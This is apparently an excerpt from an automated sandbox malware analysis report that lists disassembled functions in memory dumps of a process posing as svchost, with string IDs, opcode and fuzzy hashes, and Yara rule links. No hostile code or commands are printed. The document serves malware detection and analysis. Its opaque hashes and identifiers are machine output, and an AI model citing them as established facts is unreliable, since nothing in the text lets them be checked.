                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                                              • Opcode ID: f04ebcaffb36684a662232892a12bffc9cc331a60a9eb45958f4f3e46abc91e6
                                                                                                                                                                              • Instruction ID: e41e1c701bcdcd0ceaaf26b7c177fc6dc3fe64e65673281a147513ff365b5ba2
                                                                                                                                                                              • Opcode Fuzzy Hash: f04ebcaffb36684a662232892a12bffc9cc331a60a9eb45958f4f3e46abc91e6
                                                                                                                                                                              • Instruction Fuzzy Hash: C5A11A75A0B3686BDF68DB29C840BFEA7ED5F86304F0844E9EDC76B281C6748940CB55
                                                                                                                                                                              Function 0306A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: GlobalTags
                                                                                                                                                                              • API String ID: 0-1106856819
                                                                                                                                                                              • Opcode ID: b12f146b2d4703e31bd5cdfb87f18b4205055b8d51d73d803e69ffff66fd635b
                                                                                                                                                                              • Instruction ID: e49cf152f8883171c88ea49c6e1a809be28bfb7f107a175d531bdf996004ca1e
                                                                                                                                                                              • Opcode Fuzzy Hash: b12f146b2d4703e31bd5cdfb87f18b4205055b8d51d73d803e69ffff66fd635b
                                                                                                                                                                              • Instruction Fuzzy Hash: D6717075E0260ADFDF68DF9CE5906EEBBF5BF48700F18856AE805AB244D7328941CB50
                                                                                                                                                                              Function 0303973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                                                              • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                                                                              • Instruction ID: 95f9c03d16eb5fd41f35a9306944a51a679dd051e46857a58ec60d9933fde80c
                                                                                                                                                                              • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                                                                              • Instruction Fuzzy Hash: 79615B75D02219ABDF21DF99C840BEEFBFCEF85714F14496AE810A7290D7749A01DBA0
                                                                                                                                                                              Function 030BF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                                                              • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                                                                              • Instruction ID: 1c0bc35c4426eebf990ac5f5b4721e2764ca68dafe18bccfb8ed8a834f8e663b
                                                                                                                                                                              • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                                                                              • Instruction Fuzzy Hash: 24517876616306AFD721DF54CC40FAAB7F8FB84750F040929B9809B290D7B5ED14CB96
                                                                                                                                                                              Function 0304E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: EXT-
                                                                                                                                                                              • API String ID: 0-1948896318
                                                                                                                                                                              • Opcode ID: 36723d1c7b7fc8f34dd7cee01de121eb7ccf13501ebaf6ab092fa0236b476756
                                                                                                                                                                              • Instruction ID: 3d4f57a98735b78ad0c5187f51d04d5590476fd2813bdd6fbcfcf8b2b77a3f55
                                                                                                                                                                              • Opcode Fuzzy Hash: 36723d1c7b7fc8f34dd7cee01de121eb7ccf13501ebaf6ab092fa0236b476756
                                                                                                                                                                              • Instruction Fuzzy Hash: 65415EB650A3119BD710DA65C984BAFB7E8BF88714F440D39F984DB180E774DA04C796
                                                                                                                                                                              Function 030EB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: PreferredUILanguages
                                                                                                                                                                              • API String ID: 0-1884656846
                                                                                                                                                                              • Opcode ID: d2d85bef1ef9940b388b9d4f83440c9ea70c57be7fcb2e5f45bb071c4eb54a8e
                                                                                                                                                                              • Instruction ID: 70a05504b3309c5b10be8e8a00fd0dbd427387c3b867f05ae1e00f0eabce5d70
                                                                                                                                                                              • Opcode Fuzzy Hash: d2d85bef1ef9940b388b9d4f83440c9ea70c57be7fcb2e5f45bb071c4eb54a8e
                                                                                                                                                                              • Instruction Fuzzy Hash: 4841E476E06219AFCF11DAA8C841BEEF7B9EF84710F050566E911FB254D6B0DE40C7A4
                                                                                                                                                                              Function 030AC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: BinaryHash
                                                                                                                                                                              • API String ID: 0-2202222882
                                                                                                                                                                              • Opcode ID: 6829e7c5f9394e8aa8b4a7edbcc458e50df3284faad2a2541d3ed1a084affb25
                                                                                                                                                                              • Instruction ID: 791806b1309eb78c20f83f882b001ef1764ce0825e14a82a1d952ed3ea1dc910
                                                                                                                                                                              • Opcode Fuzzy Hash: 6829e7c5f9394e8aa8b4a7edbcc458e50df3284faad2a2541d3ed1a084affb25
                                                                                                                                                                              • Instruction Fuzzy Hash: CB4145B5D0262CABEB21DB94DC84FDEB77CAB44714F0145E5A608AB140DB709E498F94
                                                                                                                                                                              Function 030B97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: verifier.dll
                                                                                                                                                                              • API String ID: 0-3265496382
                                                                                                                                                                              • Opcode ID: fb40c903c5e2489212132e07b1a50d761a81bf1f02235bce080c02875a91b296
                                                                                                                                                                              • Instruction ID: 4d2259253a0eb1bb727564406aa9c18fb32999efd0e6e68c0a77c2ac7fd5b5c6
                                                                                                                                                                              • Opcode Fuzzy Hash: fb40c903c5e2489212132e07b1a50d761a81bf1f02235bce080c02875a91b296
                                                                                                                                                                              • Instruction Fuzzy Hash: F8317375A01301AFDB64DF699890BB6B7F6EB8D710F588479E609DF2C1E7318C8087A4
                                                                                                                                                                              Function 03035096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Actx
                                                                                                                                                                              • API String ID: 0-89312691
                                                                                                                                                                              • Opcode ID: b0be5488eaa43b68f54937da00b9d90900c1f5f23c46c96db766b3001a1f7fcd
                                                                                                                                                                              • Instruction ID: a39ed2375f79d8d2b769ab9594492ea9c8c147f26f82a295721ac18d7508b499
                                                                                                                                                                              • Opcode Fuzzy Hash: b0be5488eaa43b68f54937da00b9d90900c1f5f23c46c96db766b3001a1f7fcd
                                                                                                                                                                              • Instruction Fuzzy Hash: D41166307075028BEB64C91D8C516BAF2DDEB97264F3C492AD451CB3B1D673D8418780
                                                                                                                                                                              Function 030B106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: LdrCreateEnclave
                                                                                                                                                                              • API String ID: 0-3262589265
                                                                                                                                                                              • Opcode ID: 8427451ba46bc6ee7483c465b8aae6b8c57a3884628fe0288d197b239215f543
                                                                                                                                                                              • Instruction ID: 851250bcb64cab855bce571b922e8a6e2955c701108b611ba491171fc5b429d1
                                                                                                                                                                              • Opcode Fuzzy Hash: 8427451ba46bc6ee7483c465b8aae6b8c57a3884628fe0288d197b239215f543
                                                                                                                                                                              • Instruction Fuzzy Hash: A42115B1509344AFC324DF1AD844A9BFBF8FBD5B00F104A1EF5A09B250E7B09505CB96
                                                                                                                                                                              Function 0306E8F0 Relevance: 1.0, Instructions: 985COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 0ac7564ea8a35b6c2e7e1a05ee6489b70892fe00347a65bdf56e5cb961a42aba
                                                                                                                                                                              • Instruction ID: 4085d360ace4c7b0517a40027efb799f807afa12d5d64a1cd2efdaed4a611623
                                                                                                                                                                              • Opcode Fuzzy Hash: 0ac7564ea8a35b6c2e7e1a05ee6489b70892fe00347a65bdf56e5cb961a42aba
                                                                                                                                                                              • Instruction Fuzzy Hash: 80824472F102188BCB58CFADDC916DDB7F2EF88314B19812DE416EB349DA34AC568B45
                                                                                                                                                                              Function 0307516C Relevance: .8, Instructions: 785COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 075f7a4758ae7b780609c925abc9a58ed24efbc524900986108974868b961305
                                                                                                                                                                              • Instruction ID: 85e923949842ce076e431d66af8af00c764607a86a73b7f4bef0b7b8d846a4bb
                                                                                                                                                                              • Opcode Fuzzy Hash: 075f7a4758ae7b780609c925abc9a58ed24efbc524900986108974868b961305
                                                                                                                                                                              • Instruction Fuzzy Hash: F3628132D0664AAFCF24CF08D8904EEFBA2FE56314B49C59CC89A27604D371B955CBD9
                                                                                                                                                                              Function 0308739A Relevance: .7, Instructions: 705COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 7eb5aed3955f605c5b7548740e048c3ed2b4b268efe91a8d6a29b1027f8205d1
                                                                                                                                                                              • Instruction ID: 49e6e51195824f672b8696c59d89f19a50d184ea50c1eeee63c2c1d8cd9d9860
                                                                                                                                                                              • Opcode Fuzzy Hash: 7eb5aed3955f605c5b7548740e048c3ed2b4b268efe91a8d6a29b1027f8205d1
                                                                                                                                                                              • Instruction Fuzzy Hash: C042D375A026168FDB18DF59C4806BEF7F6FF88B14B28856DD592AB344D730E842CB90
                                                                                                                                                                              Function 03085AA0 Relevance: .7, Instructions: 652COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                                                                                                              • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                                                                                                                                                              • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                                                                                                              • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                                                                                                                              Function 0305B2C0 Relevance: .6, Instructions: 629COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: abbdc3ceaafea9791a5f051807acc3db9b5ff6b158b3abfddcd566c6a7f1e5ad
                                                                                                                                                                              • Instruction ID: 44279d0a44a64d487817d550afc94fa377e9a08fec79d91a3f8921734e2c935e
                                                                                                                                                                              • Opcode Fuzzy Hash: abbdc3ceaafea9791a5f051807acc3db9b5ff6b158b3abfddcd566c6a7f1e5ad
                                                                                                                                                                              • Instruction Fuzzy Hash: 6E329F75E02219DFCF24DF68C894BAEBBB5FF94714F184029E805AB381E775A911CB90
                                                                                                                                                                              Function 030C8158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: bbbf8d65be57ddf101bd08dbb3f0efc20db14b53219681ca9794a5fe914b5724
                                                                                                                                                                              • Instruction ID: 9cad2d641a539b02affaf8ffea5caca188461eb4e1d7ec7e1fe1e9bc7d31e668
                                                                                                                                                                              • Opcode Fuzzy Hash: bbbf8d65be57ddf101bd08dbb3f0efc20db14b53219681ca9794a5fe914b5724
                                                                                                                                                                              • Instruction Fuzzy Hash: 73425875A112599FDB64CF69C881BAEF7F5BF88300F18C09DE848AB241D7349985CF64
                                                                                                                                                                              Function 03042840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: cf97de1130d6ceeea5a4244f3c66bb48c84f99427810e2aadbae4471fe581434
                                                                                                                                                                              • Instruction ID: 32d9493f9475a9b918400dc5427efe4df6054115ce88c2fa5bd92e7867ee9894
                                                                                                                                                                              • Opcode Fuzzy Hash: cf97de1130d6ceeea5a4244f3c66bb48c84f99427810e2aadbae4471fe581434
                                                                                                                                                                              • Instruction Fuzzy Hash: 8A32FF74A027198FEF24CF69C8447BEFBF6AF84310F18456EE4869B684D736A841DB50
                                                                                                                                                                              Function 030DA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 979873a2573b12ea4bd624a7546f756ac825f4cca7c365771f808a90b5528d7f
                                                                                                                                                                              • Instruction ID: a25604a5b0a8f935929d9bb90fdbd82086e32651b001c47ad6a475a865e9e99e
                                                                                                                                                                              • Opcode Fuzzy Hash: 979873a2573b12ea4bd624a7546f756ac825f4cca7c365771f808a90b5528d7f
                                                                                                                                                                              • Instruction Fuzzy Hash: C122BC74706751CFDB64CF29C494376B7F1AF44300F08889AE8968F68AE739E592CB64
                                                                                                                                                                              Function 030F16CC Relevance: .6, Instructions: 571COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 1cfa0a8839a9b046b9a76791b18719bffa94b70ebc565937c8bfcc5181c6289f
                                                                                                                                                                              • Instruction ID: e03bb2487a9c73ae3c1a32c0b8f6e1bff45996c08ea0d73b12b5d10d21c1ee56
                                                                                                                                                                              • Opcode Fuzzy Hash: 1cfa0a8839a9b046b9a76791b18719bffa94b70ebc565937c8bfcc5181c6289f
                                                                                                                                                                              • Instruction Fuzzy Hash: 9122B135A02216CFCB1DCF59C490AAEF7F6BF88314B1845ADDA569B744DB30E942CB90
                                                                                                                                                                              Function 0305FB80 Relevance: .6, Instructions: 559COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 7fb712e3519d6587cd216b97db38288d459474078b6d696ea532c7ec8df258b9
                                                                                                                                                                              • Instruction ID: 17ec7e614aa2226c1c555fb7fdd63bd1b1b1f170ab6ed4d4e743657849188103
                                                                                                                                                                              • Opcode Fuzzy Hash: 7fb712e3519d6587cd216b97db38288d459474078b6d696ea532c7ec8df258b9
                                                                                                                                                                              • Instruction Fuzzy Hash: 2E22C474A0160AEFDB54DFA8D880BEEB7B5FF88310F1485A9D8549B245D734EA81CB90
                                                                                                                                                                              Function 030F1D5A Relevance: .6, Instructions: 559COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 4a4c67c3336748d8de0ccfd4bade89cf86f40434a349ab90740df031f07d31a0
                                                                                                                                                                              • Instruction ID: ee5fc939aa00eca1f82ac110c9ce92ff37dddeb51638897d7641ebcaa1090a30
                                                                                                                                                                              • Opcode Fuzzy Hash: 4a4c67c3336748d8de0ccfd4bade89cf86f40434a349ab90740df031f07d31a0
                                                                                                                                                                              • Instruction Fuzzy Hash: AF22B1796063129FC758CF18C490A6AF3E9FFC8314B184A6DEA96CB751D730E846CB91
                                                                                                                                                                              Function 03058DBF Relevance: .6, Instructions: 554COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: ea30d8a7a2a6b7e93268597b7c05d89476f40f3a1e5e49a8edf03285fd8adaa8
                                                                                                                                                                              • Instruction ID: 271cef7b41e41a1e6ae24008149aae819d152e78103b8610e8c78be9e27db252
                                                                                                                                                                              • Opcode Fuzzy Hash: ea30d8a7a2a6b7e93268597b7c05d89476f40f3a1e5e49a8edf03285fd8adaa8
                                                                                                                                                                              • Instruction Fuzzy Hash: CB224E74E4121ADBDF58CF95C480ABEFBF6BF88304B18849AEC45AB241E734D941DB64
                                                                                                                                                                              Function 030F2446 Relevance: .5, Instructions: 485COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2cad59c6296e2c7ab788b3de65f0ce45fed1564bec383af2ac9aa3a137c3541c
                                                                                                                                                                              • Instruction ID: 7732b0d685b759c2469dfd6ce1164faf92ccdbc88523fae8b2f54ef094fd027b
                                                                                                                                                                              • Opcode Fuzzy Hash: 2cad59c6296e2c7ab788b3de65f0ce45fed1564bec383af2ac9aa3a137c3541c
                                                                                                                                                                              • Instruction Fuzzy Hash: B40217386066518FDB54CF2AC45037AF7F9AF85300B188D9ADAD6CFA81D734E852DB60
                                                                                                                                                                              Function 0310B16B Relevance: .4, Instructions: 450COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 42b1cb1ff3493f156f92013c1eea42ca8b03910fe9694bc9aa20fd4dbe3ff8d8
                                                                                                                                                                              • Instruction ID: 69c7a6082174aaa40707379d7f0143635ced38801b3785a56e243aca396cf144
                                                                                                                                                                              • Opcode Fuzzy Hash: 42b1cb1ff3493f156f92013c1eea42ca8b03910fe9694bc9aa20fd4dbe3ff8d8
                                                                                                                                                                              • Instruction Fuzzy Hash: 9CF1E672E046159BCB18CFA9C9A067EFBF5AF8C21071981ADD456DB3C0D7B4EA41CB90
                                                                                                                                                                              Function 00410753 Relevance: .4, Instructions: 435COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                                              • Instruction ID: 48c22d5f5845019e1daf19faa8d30ee29689d4dc1a91d65db1aa33eb46ffd182
                                                                                                                                                                              • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                                              • Instruction Fuzzy Hash: E2026E73E547164FE720CE4ACDC4765B3A3EFC8301F5B81B8CA142B613CA79BA525A90
                                                                                                                                                                              Function 0310A9A6 Relevance: .4, Instructions: 425COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 0209d6c0643eac48232475be1cc6da9855622741d12e88e44abf27943a4b3468
                                                                                                                                                                              • Instruction ID: a8b9758fefbe13c39e023b5f49e55463c7503aa4f0c784dee5beb78217c21223
                                                                                                                                                                              • Opcode Fuzzy Hash: 0209d6c0643eac48232475be1cc6da9855622741d12e88e44abf27943a4b3468
                                                                                                                                                                              • Instruction Fuzzy Hash: D3F1A673E006269BCB18CF69C9A05BDFBF5AF4921071A4269D856EB3C0D774EE41CB90
                                                                                                                                                                              Function 0305FDC0 Relevance: .4, Instructions: 390COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
